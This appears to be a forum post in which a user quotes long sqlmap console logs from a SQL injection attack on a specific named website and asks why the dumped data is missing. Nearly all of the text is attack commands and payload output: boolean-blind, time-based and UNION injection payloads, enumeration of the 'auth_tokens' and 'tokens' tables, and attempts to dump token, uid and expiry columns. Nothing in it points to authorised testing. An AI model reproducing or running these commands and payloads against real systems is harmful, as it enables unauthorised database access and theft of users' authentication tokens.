[19:00:09] [PAYLOAD] kalyan' AND (SELECT 9719 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id<=50),1,1))>51,0,5)))))aZeu) AND 'OxMW'='OxMW
                                                                            [19:00:09] [WARNING] time-based comparison requires larger statistical model, please wait...................... (done)
[19:00:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:46] [PAYLOAD] kalyan' AND (SELECT 9719 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id<=50),1,1))>48,0,5)))))aZeu) AND 'OxMW'='OxMW
[19:00:46] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[19:00:48] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:48] [PAYLOAD] kalyan' AND (SELECT 9719 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id<=50),1,1))>9,0,5)))))aZeu) AND 'OxMW'='OxMW
[19:00:49] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:00:49] [INFO] retrieved:
[19:00:49] [DEBUG] performed 3 queries in 39.80 seconds
[19:00:49] [WARNING] unable to retrieve the number of column(s) '`hash`,expires,id,selector,uid' entries for table 'auth_tokens' in database 'sattaz'
[19:00:49] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 11 times
[19:00:49] [INFO] fetched data logged to text files under 'C:\Users\user\AppData\Local\sqlmap\output\sattaz.com'

[*] ending @ 19:00:49 /2025-09-29/

PS C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf> py sqlmap.py -u "https://sattaz.com/guessing/kalyan" \ --random-agent --batch \ -D sattaz -T tokens \ -C "id,uid,token" \ --dump --where="id<=50" \ --threads=1 --delay=1 -v 3
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.9.9.4#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:01:10 /2025-09-29/

[19:01:10] [DEBUG] cleaning up configuration parameters
[19:01:10] [DEBUG] setting the HTTP timeout
[19:01:10] [DEBUG] setting the HTTP User-Agent header
[19:01:10] [DEBUG] loading random HTTP User-Agent header(s) from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[19:01:10] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36' from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[19:01:10] [DEBUG] creating HTTP requests opener object
[19:01:11] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[19:01:11] [DEBUG] used the default behavior, running in batch mode
[19:01:11] [INFO] resuming back-end DBMS 'mysql'
[19:01:11] [DEBUG] resolving hostname 'sattaz.com'
[19:01:11] [INFO] testing connection to the target URL
[19:01:13] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 3128=3128 AND 'bkro'='bkro
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 5069 FROM (SELECT(SLEEP(5)))bPdu) AND 'LtnB'='LtnB
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5845694c6b505445616662576a574e794f727364726a4a63634d4f4d53744878534246766e455a50,0x716a6a7871),NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL-- -
---
[19:01:13] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[19:01:13] [INFO] fetching entries of column(s) 'id,token,uid' for table 'tokens' in database 'sattaz'
[19:01:13] [DEBUG] resuming configuration option 'code' (200)
[19:01:13] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[19:01:13] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(id AS NCHAR),0x20),IFNULL(CAST(token AS NCHAR),0x20),IFNULL(CAST(uid AS NCHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=50-- -
[19:01:15] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:15] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(id AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(token AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS NCHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=50-- -
[19:01:17] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:17] [DEBUG] turning off NATIONAL CHARACTER casting
[19:01:17] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(id AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(token AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=50-- -
[19:01:18] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:18] [DEBUG] performed 3 queries in 5.03 seconds
[19:01:18] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[19:01:18] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(id AS CHAR),0x20),IFNULL(CAST(token AS CHAR),0x20),IFNULL(CAST(uid AS CHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=50-- -
[19:01:20] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:20] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.tokens WHERE id<=50-- -
[19:01:21] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:21] [WARNING] the SQL query provided does not return any output
[19:01:21] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:01:21] [INFO] fetching number of column(s) 'id,token,uid' entries for table 'tokens' in database 'sattaz'
[19:01:21] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:01:21] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=50),1,1))>51 AND 'GkPv'='GkPv
[19:01:23] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:23] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[19:01:23] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=50),1,1))>48 AND 'GkPv'='GkPv
[19:01:25] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:25] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=50),1,1))>9 AND 'GkPv'='GkPv
[19:01:26] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:01:26] [INFO] retrieved:
[19:01:26] [DEBUG] performed 3 queries in 4.82 seconds
[19:01:26] [PAYLOAD] kalyan' AND (SELECT 8589 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=50),1,1))>51,0,5)))))ldgt) AND 'xlPJ'='xlPJ
                                                                            [19:01:26] [WARNING] time-based comparison requires larger statistical model, please wait...................... (done)
[19:02:04] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:02:04] [PAYLOAD] kalyan' AND (SELECT 8589 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=50),1,1))>48,0,5)))))ldgt) AND 'xlPJ'='xlPJ
[19:02:04] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[19:02:06] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:02:06] [PAYLOAD] kalyan' AND (SELECT 8589 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.tokens WHERE id<=50),1,1))>9,0,5)))))ldgt) AND 'xlPJ'='xlPJ
[19:02:07] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[19:02:07] [INFO] retrieved:
[19:02:07] [DEBUG] performed 3 queries in 41.04 seconds
[19:02:07] [WARNING] unable to retrieve the number of column(s) 'id,token,uid' entries for table 'tokens' in database 'sattaz'
[19:02:07] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 11 times
[19:02:07] [INFO] fetched data logged to text files under 'C:\Users\user\AppData\Local\sqlmap\output\sattaz.com'

[*] ending @ 19:02:07 /2025-09-29/

etc/passwd · 02.10.2025

кекич сказал(а):

не подскажешь? почему я вроде сделал дамп, его нет негде(

Код:

PS C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf> py sqlmap.py -u "https://sattaz.com/guessing/kalyan" \ --random-agent --batch \ --risk=1 --level=2 \ -D sattaz -T auth_tokens --columns \ --threads=1 --delay=1 -v 3

        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.9.4#dev}
|_ -| . [)]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:53:31 /2025-09-29/

[18:53:31] [DEBUG] cleaning up configuration parameters
[18:53:31] [DEBUG] setting the HTTP timeout
[18:53:31] [DEBUG] setting the HTTP User-Agent header
[18:53:31] [DEBUG] loading random HTTP User-Agent header(s) from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:53:31] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:53:31] [DEBUG] creating HTTP requests opener object
[18:53:32] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[18:53:32] [DEBUG] used the default behavior, running in batch mode
[18:53:32] [INFO] resuming back-end DBMS 'mysql'
[18:53:32] [DEBUG] resolving hostname 'sattaz.com'
[18:53:32] [INFO] testing connection to the target URL
[18:53:34] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 3128=3128 AND 'bkro'='bkro
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 5069 FROM (SELECT(SLEEP(5)))bPdu) AND 'LtnB'='LtnB
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5845694c6b505445616662576a574e794f727364726a4a63634d4f4d53744878534246766e455a50,0x716a6a7871),NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL-- -
---
[18:53:34] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[18:53:34] [INFO] fetching columns for table 'auth_tokens' in database 'sattaz'
[18:53:34] [DEBUG] resuming configuration option 'code' (200)
[18:53:34] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(column_name AS NCHAR),0x20),IFNULL(CAST(column_type AS NCHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x617574685f746f6b656e73 AND table_schema=0x73617474617a-- -
[18:53:38] [WARNING] reflective value(s) found and filtering out
[18:53:38] [DEBUG] performed 1 query in 3.90 seconds
Database: sattaz
Table: auth_tokens
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| hash     | char(64)     |
| expires  | datetime     |
| id       | int unsigned |
| selector | char(12)     |
| uid      | int unsigned |
+----------+--------------+

[18:53:38] [INFO] fetched data logged to text files under 'C:\Users\user\AppData\Local\sqlmap\output\sattaz.com'

[*] ending @ 18:53:38 /2025-09-29/

PS C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf> py sqlmap.py -u "https://sattaz.com/guessing/kalyan" \ --random-agent --batch \ --risk=1 --level=2 \ -D sattaz -T tokens --columns \ --threads=1 --delay=1 -v 3
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.9.4#dev}
|_ -| . [(]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:54:47 /2025-09-29/

[18:54:47] [DEBUG] cleaning up configuration parameters
[18:54:47] [DEBUG] setting the HTTP timeout
[18:54:47] [DEBUG] setting the HTTP User-Agent header
[18:54:47] [DEBUG] loading random HTTP User-Agent header(s) from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:54:47] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15' from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:54:47] [DEBUG] creating HTTP requests opener object
[18:54:47] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[18:54:47] [DEBUG] used the default behavior, running in batch mode
[18:54:47] [INFO] resuming back-end DBMS 'mysql'
[18:54:47] [DEBUG] resolving hostname 'sattaz.com'
[18:54:47] [INFO] testing connection to the target URL
[18:54:49] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 3128=3128 AND 'bkro'='bkro
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 5069 FROM (SELECT(SLEEP(5)))bPdu) AND 'LtnB'='LtnB
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5845694c6b505445616662576a574e794f727364726a4a63634d4f4d53744878534246766e455a50,0x716a6a7871),NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL-- -
---
[18:54:50] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[18:54:50] [INFO] fetching columns for table 'tokens' in database 'sattaz'
[18:54:50] [DEBUG] resuming configuration option 'code' (200)
[18:54:50] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(column_name AS NCHAR),0x20),IFNULL(CAST(column_type AS NCHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x746f6b656e73 AND table_schema=0x73617474617a-- -
[18:54:53] [WARNING] reflective value(s) found and filtering out
[18:54:53] [DEBUG] performed 1 query in 3.74 seconds
Database: sattaz
Table: tokens
[4 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| id     | int          |
| sent   | int          |
| token  | varchar(164) |
| uid    | int          |
+--------+--------------+

[18:54:53] [INFO] fetched data logged to text files under 'C:\Users\user\AppData\Local\sqlmap\output\sattaz.com'

[*] ending @ 18:54:53 /2025-09-29/

PS C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf> py sqlmap.py -u "https://sattaz.com/guessing/kalyan" \ --random-agent --batch \ -D sattaz -T auth_tokens \ -C "id,uid,expires" \ --dump --where="id <= 50" \ --threads=1 --delay=1 -v 3
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.9.9.4#dev}
|_ -| . [.]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:55:35 /2025-09-29/

[18:55:35] [DEBUG] cleaning up configuration parameters
[18:55:35] [DEBUG] setting the HTTP timeout
[18:55:35] [DEBUG] setting the HTTP User-Agent header
[18:55:35] [DEBUG] loading random HTTP User-Agent header(s) from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:55:35] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.93 Safari/537.36' from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:55:35] [DEBUG] creating HTTP requests opener object
[18:55:35] [WARNING] you've provided target URL without any GET parameters (e.g. 'http://www.site.com/article.php?id=1') and without providing any POST parameters through option '--data'
do you want to try URI injections in the target URL itself? [Y/n/q] Y
[18:55:35] [DEBUG] used the default behavior, running in batch mode
[18:55:35] [INFO] resuming back-end DBMS 'mysql'
[18:55:35] [DEBUG] resolving hostname 'sattaz.com'
[18:55:35] [INFO] testing connection to the target URL
[18:55:37] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: https://sattaz.com/guessing/kalyan' AND 3128=3128 AND 'bkro'='bkro
    Vector: AND [INFERENCE]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://sattaz.com/guessing/kalyan' AND (SELECT 5069 FROM (SELECT(SLEEP(5)))bPdu) AND 'LtnB'='LtnB
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: https://sattaz.com/guessing/kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,0x5845694c6b505445616662576a574e794f727364726a4a63634d4f4d53744878534246766e455a50,0x716a6a7871),NULL,NULL,NULL-- -
    Vector:  UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,[QUERY],NULL,NULL,NULL-- -
---
[18:55:38] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.12
[18:55:38] [INFO] fetching entries of column(s) 'expires,id,uid' for table 'auth_tokens' in database 'sattaz'
[18:55:38] [DEBUG] resuming configuration option 'code' (200)
[18:55:38] [DEBUG] stripping ORDER BY clause from statement because it does not play well with UNION query SQL injection
[18:55:38] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(expires AS NCHAR),0x20),IFNULL(CAST(id AS NCHAR),0x20),IFNULL(CAST(uid AS NCHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id <= 50-- -
[18:55:39] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:39] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(expires AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(id AS NCHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS NCHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id <= 50-- -
[18:55:41] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:41] [DEBUG] turning off NATIONAL CHARACTER casting
[18:55:41] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(expires AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(id AS CHAR),0x20),0x6d6a67777966,IFNULL(CAST(uid AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id <= 50-- -
[18:55:42] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:43] [DEBUG] performed 3 queries in 4.81 seconds
[18:55:43] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[18:55:43] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,JSON_ARRAYAGG(CONCAT_WS(0x6d6a67777966,IFNULL(CAST(expires AS CHAR),0x20),IFNULL(CAST(id AS CHAR),0x20),IFNULL(CAST(uid AS CHAR),0x20))),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id <= 50-- -
[18:55:44] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:44] [PAYLOAD] kalyan' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170767671,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x716a6a7871),NULL,NULL,NULL FROM sattaz.auth_tokens WHERE id <= 50-- -
[18:55:46] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:46] [WARNING] the SQL query provided does not return any output
[18:55:46] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[18:55:46] [INFO] fetching number of column(s) 'expires,id,uid' entries for table 'auth_tokens' in database 'sattaz'
[18:55:46] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[18:55:46] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id <= 50),1,1))>51 AND 'bLDh'='bLDh
[18:55:47] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:47] [WARNING] unexpected HTTP code '500' detected. Will use (extra) validation step in similar cases
[18:55:47] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id <= 50),1,1))>48 AND 'bLDh'='bLDh
[18:55:49] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:49] [PAYLOAD] kalyan' AND ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id <= 50),1,1))>9 AND 'bLDh'='bLDh
[18:55:51] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:55:51] [INFO] retrieved:
[18:55:51] [DEBUG] performed 3 queries in 4.88 seconds
[18:55:51] [PAYLOAD] kalyan' AND (SELECT 7535 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id <= 50),1,1))>51,0,5)))))UaLq) AND 'BJTA'='BJTA
                                                                            [18:55:51] [WARNING] time-based comparison requires larger statistical model, please wait...................... (done)
[18:56:27] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:56:27] [PAYLOAD] kalyan' AND (SELECT 7535 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id <= 50),1,1))>48,0,5)))))UaLq) AND 'BJTA'='BJTA
[18:56:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[18:56:29] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:56:29] [PAYLOAD] kalyan' AND (SELECT 7535 FROM (SELECT(SLEEP(5-(IF(ORD(MID((SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM sattaz.auth_tokens WHERE id <= 50),1,1))>9,0,5)))))UaLq) AND 'BJTA'='BJTA
[18:56:30] [DEBUG] got HTTP error code: 500 ('Internal Server Error')
[18:56:30] [INFO] retrieved:
[18:56:30] [DEBUG] performed 3 queries in 39.53 seconds
[18:56:30] [WARNING] unable to retrieve the number of column(s) 'expires,id,uid' entries for table 'auth_tokens' in database 'sattaz'
[18:56:30] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 11 times
[18:56:30] [INFO] fetched data logged to text files under 'C:\Users\user\AppData\Local\sqlmap\output\sattaz.com'

[*] ending @ 18:56:30 /2025-09-29/

PS C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf> py sqlmap.py -u "https://sattaz.com/guessing/kalyan" \ --random-agent --batch \ -D sattaz -T tokens \ -C "id,uid,sent" \ --dump --where="id<=200" \ --threads=1 --delay=1 -v 3
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.9.9.4#dev}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:57:37 /2025-09-29/

[18:57:37] [DEBUG] cleaning up configuration parameters
[18:57:38] [DEBUG] setting the HTTP timeout
[18:57:38] [DEBUG] setting the HTTP User-Agent header
[18:57:38] [DEBUG] loading random HTTP User-Agent header(s) from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:57:38] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36' from file 'C:\Users\user\OneDrive\Desktop\sqlmapproject-sqlmap-71a12bf\data\txt\user-agents.txt'
[18:57:38] [DEBUG] creating HTTP requests opener object
